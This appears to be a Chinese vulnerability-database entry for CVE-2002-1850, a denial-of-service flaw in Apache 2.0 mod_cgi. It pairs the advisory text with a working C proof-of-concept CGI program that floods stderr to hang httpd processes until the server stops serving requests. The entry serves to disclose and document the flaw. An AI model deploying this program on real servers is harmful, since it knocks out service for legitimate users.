Apache2 MOD_CGI STDERR拒绝服务攻击漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1106990 漏洞类型 其他
发布时间 2002-09-24 更新时间 2006-09-08
CVE编号 CVE-2002-1850 CNNVD-ID CNNVD-200212-121
漏洞平台 Linux CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/21854
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200212-121
|漏洞详情
ApacheHTTPServer是美国阿帕奇(Apache)软件基金会的一款开源网页服务器。该服务器具有快速、可靠且可通过简单的API进行扩充的特点。Apache2在处理CGI脚本输出超多数据到STDERR时存在问题,本地攻击者可以利用这个漏洞对Apache服务程序进行拒绝服务攻击。在mod_cgi模块下如果在完成写入和关闭STDOUT之前CGI脚本输出超过4096字节到STDERR,由于mod_cgi中write()调用被琐等待CGI中获得更多输入而挂起。问题主要是mod_cgi开始读取所有stdout输入,然后开始读取STDERR输出,APR的处理流的file_io只有4096字节的缓冲区,在后续的脚本继续写入数据到STDERR时会挂起,等待mod_cgi通过APRfile_io从流中读取部分数据。由于Apache2会等待从恶意CGI应用中获得更多输入,httpd进程就会挂起,当达到Apache限定的最大连接限制时,Apache就会停止正常的用户请求。
|漏洞EXP
source: http://www.securityfocus.com/bid/5787/info

Apache is prone to a denial of service condition when an excessive amount of data is written to stderr. This condition reportedly occurs when the amount of data written to stderr is over the default amount allowed by the operating system.

This may potentially be an issue in web applications that write user-supplied data to stderr. Additionally, locally based attackers may exploit this issue. 

This issue has been confirmed in Apache 2.0.39/2.0.40 on Linux operating systems. Apache on other platforms may also be affected. This issue does not appear to be present in versions prior to 2.0.x.

// Credit to: K.C. Wong
#include <stdio.h>
#include <time.h>
#include <unistd.h>
#include <fcntl.h>

#define SIZE 4075

void out_err()
{
        char buffer[SIZE];
        int i = 0;

        for (i = 0; i < SIZE - 1; ++i)
                buffer[i] = 'a' + (char )(i % 26);

        buffer[SIZE - 1] = '\0';

//
fcntl(2, F_SETFL, fcntl(2, F_GETFL) | O_NONBLOCK);

        fprintf(stderr, "short test\n");
        fflush(stderr);

        fprintf(stderr, "test error=%s\n", buffer);
        fflush(stderr);
} // out_err()

int main(int argc, char ** argv)
{
        fprintf(stdout, "Context-Type: text/html\r\n");
        fprintf(stdout, "\r\n\r\n");
        out_err();
        fprintf(stdout, "<HTML>\n");
        fprintf(stdout, "<body>\n");
        fprintf(stdout, "<h1>hello world</h1>\n");
        fprintf(stdout, "</body>\n");
        fprintf(stdout, "</HTML>\n");
        fflush(stdout);
        exit(0);
} // main()
|参考资料

来源:BID
名称:8725
链接:http://www.securityfocus.com/bid/8725
来源:XF
名称:apache-stderr-dos(10200)
链接:http://www.iss.net/security_center/static/10200.php
来源:SECTRACK
名称:1007823
链接:http://securitytracker.com/id?1007823
来源:issues.apache.org
链接:http://issues.apache.org/bugzilla/show_bug.cgi?id=22030
来源:BID
名称:5787
链接:http://www.securityfocus.com/bid/5787
来源:BUGTRAQ
名称:20020923Apache2.0.(39|40)DOS(PHP!)
链接:http://seclists.org/bugtraq/2002/Sep/0253.html
来源:MLIST
名称:[apache-httpd-dev]20020925CGIbucketneeded
链接:http://marc.theaimsgroup.com/?l=apache-httpd-dev&m=103291952019514&w=2
来源:issues.apache.org
链接:http://issues.apache.org/bugzilla/show_bug.cgi?id=10515
来源:cvs.apache.org
链接:http://cvs.apache.org/viewcvs.cgi/httpd-2.0/modules/generators/mod_cgi.c?r1=1.148.2.7&r2=1.148.2.8
来源:NSFOCUS
名称:5483
链接:http://www.nsfocus.net/vulndb/5483